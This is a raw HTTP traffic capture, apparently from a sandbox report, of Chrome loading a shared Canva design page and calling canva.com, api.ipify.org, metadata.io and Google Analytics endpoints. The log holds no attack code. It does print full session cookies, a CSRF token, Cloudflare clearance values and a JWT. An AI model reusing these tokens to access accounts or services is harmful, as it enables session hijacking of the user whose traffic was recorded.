                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_cam [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC1055INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:57 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595179b9a6de96-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e595179b9a6de96
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7pMYxtzd3dm%2BOXziZwIL36Y1a8R17hWF0IcTzRMmQnvAMIl2icvcZjv8v56m51TYwh2NJEEHj5QT164df96rzEgce70myCvJHS0wsaoc%2FyCyZzjL0LUjZGOyZmAMWsY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    139192.168.2.1249877104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC2912OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 1555
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Csrf-Token: m65uuiM4hOHpo06dgSPhRqPEhdCRKiuvQOasLfvHE7DP5kTUrBM4kf_aI1UofOUgkerkC_LfxNF6gOeRLqtMopdba-0
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC1555OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 37 61 30 66 36 39 37 34 2d 65 37 32 36 2d 34 34 33 66 2d 38 66 37 63 2d 61 36 62 31 66 34 34 34 63 62 37 62 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 35 30 2e 37 39 37 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 35 34 2e 35 34 38 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 57 4b 4c 55 4f 22 3a 22 41 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 57 4c 4f 22 3a 22 42 22 2c 22 55 54 43 55 49 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 52 52 53 43 32 22 3a 22 43 22 2c 22 50 52 54 43 32 22 3a 22 42 22 2c 22 50 52 46 44 4f
                                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"7a0f6974-e726-443f-8f7c-a6b1f444cb7b","E":"2024-11-20T15:01:50.797Z","F":"2024-11-20T15:01:54.548Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"WKLUO":"A","WKDUI":"A","VSWLO":"B","UTCUI":"B","TOMLO":"A","RRSC2":"C","PRTC2":"B","PRFDO
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC1067INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:57 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595179dd150f83-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e595179dd150f83
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5KhItB5xhf8PzkEa8ODBAWHVnfCkeNWRQGkSq5A0IbWtuoj0Wt8csmk1CfpAQd5tF1wN%2BPgZUzuEdRWgR9gyAA2qeuJ9gwjV5BJh3fL%2Bhp%2BI4%2FJtMQ0%2F5E9o0oI20M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    140192.168.2.1249879104.26.13.205443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC349OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC405INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:57 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Content-Length: 20
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e59517b9e18c457-EWR
                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3959&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=927&delivery_rate=1676234&cwnd=252&unsent_bytes=0&cid=d410537815ef0bd2&ts=461&x=0"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC20INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
                                                                                                                                                                                                                                                                    Data Ascii: {"ip":"8.46.123.75"}


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    141192.168.2.124987818.161.111.63443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC361OUTGET /pixel/config/1721.json HTTP/1.1
                                                                                                                                                                                                                                                                    Host: cdn.metadata.io
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC810INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Content-Length: 354
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                    Last-Modified: Mon, 22 Jul 2024 02:40:56 GMT
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: M9mCnq1eLFymQr3gKnRqRiqpIYrp9XbS
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:55 GMT
                                                                                                                                                                                                                                                                    ETag: "b4f9f0dd587c5abe6708f44a6e11a53f"
                                                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                    Via: 1.1 cd436c4b56d76ad1cb04b447a4cd9cfe.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: MRS52-P4
                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: K3dFqFNLONGZUVVMg8qxLtnH9PeDkY2VI7w8By38TL0sVPW300CfEQ==
                                                                                                                                                                                                                                                                    Age: 1062
                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC354INData Raw: 7b 22 70 69 78 65 6c 4a 77 74 22 3a 20 22 65 79 4a 30 65 58 41 69 4f 69 4a 4b 56 31 51 69 4c 43 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 4a 39 2e 65 79 4a 7a 64 57 49 69 4f 69 4a 77 61 58 68 6c 62 43 42 6a 62 32 35 6d 61 57 63 69 4c 43 4a 75 59 57 31 6c 49 6a 6f 69 51 32 46 75 64 6d 45 67 53 57 35 6a 4c 69 49 73 49 6d 6c 7a 63 79 49 36 49 6d 31 6c 64 47 46 6b 59 58 52 68 49 47 6c 75 59 79 34 69 4c 43 4a 68 64 57 51 69 4f 69 49 78 4e 7a 49 78 49 69 77 69 5a 58 68 77 49 6a 6f 78 4e 7a 59 33 4d 54 45 35 4e 44 41 77 4c 43 4a 70 59 58 51 69 4f 6a 45 33 4d 6a 45 78 4d 7a 63 78 4d 44 59 73 49 6d 35 69 5a 69 49 36 4d 54 63 78 4f 54 63 33 4d 6a 49 77 4d 43 77 69 59 32 39 73 62 47 56 6a 64 45 6c 75 63 32 6c 6e 61 48 52 7a 49 6a 6f 77 4c 43 4a 77 59 57 4e 72
                                                                                                                                                                                                                                                                    Data Ascii: {"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNr


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    142192.168.2.1249882104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1884OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_cam [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1071INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:59 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59518618a04225-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e59518618a04225
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9u3WeWD%2FaIHIkcAJaYGmH22rJL%2BUXFcuhAGLDV8IaBrDvseb0M6vE1s%2B0UjJw0IXpQplmMnFfoTzvZXuV77t5kLboyKw7r6xMp25t91WsC1irq8m0W3zpJqqec5dCU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    143192.168.2.1249883216.239.36.21443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC2218OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471z8812729902za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1732114904608&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_173211538951881&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custom_event_name=new.user.engag [TRUNCATED]
                                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=yYnxTqm5M9g7tWX5rpJjatUPTNcfdWD6Xmq%2B7VoIu03rCvYhYXbTU%2BVqQTDaLDcqMANWlofzMAL3JETgaK5UDEgRPf%2FUJhcVpP5QGA532pwwgtoBlEbJcN0vJrXs0Q%3D%3D
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC579INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:59 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
